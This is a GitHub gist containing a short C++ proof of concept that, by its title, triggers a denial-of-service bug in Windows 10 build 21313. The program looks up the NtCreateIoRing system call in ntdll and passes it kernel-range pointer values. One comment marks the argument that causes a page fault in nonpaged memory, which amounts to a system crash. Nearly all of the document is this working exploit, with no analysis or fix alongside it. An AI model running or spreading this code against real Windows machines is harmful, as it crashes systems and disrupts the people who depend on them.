Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Denial of Service bug in Windows 10 (21313 build) NtCreateIoRing
#include <Windows.h>
#include <cstdio>
typedef NTSTATUS(NTAPI* pfnNtCreateIoRing)(
ULONG_PTR Param1,
ULONG_PTR Param2,
ULONG_PTR Param3,
ULONG_PTR Param4
);
int main()
{
HMODULE hDll = GetModuleHandle(TEXT("ntdll.dll"));
pfnNtCreateIoRing NtCreateIoRing;
printf_s("[>]Start\r\n");
if (hDll) {
NtCreateIoRing = (pfnNtCreateIoRing)GetProcAddress(hDll, "NtCreateIoRing");
if (NtCreateIoRing) {
NTSTATUS ntStatus = NtCreateIoRing(0x00007fffffff0000,
0xffff080000000000,
0xffff800000000000, //<- page fault in nonpaged area, read
0xffff800000000001);
printf_s(">NtCreateIoRing NTSTATUS 0x%lX\r\n", ntStatus);
}
else {
DWORD lastError = GetLastError();
printf_s(">NtCreateIoRing not found, GetLastError %lu\r\n", lastError);
}
}
else {
printf_s(">No dll handle\r\n");
}
printf_s("[<]Stop");
ExitProcess(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment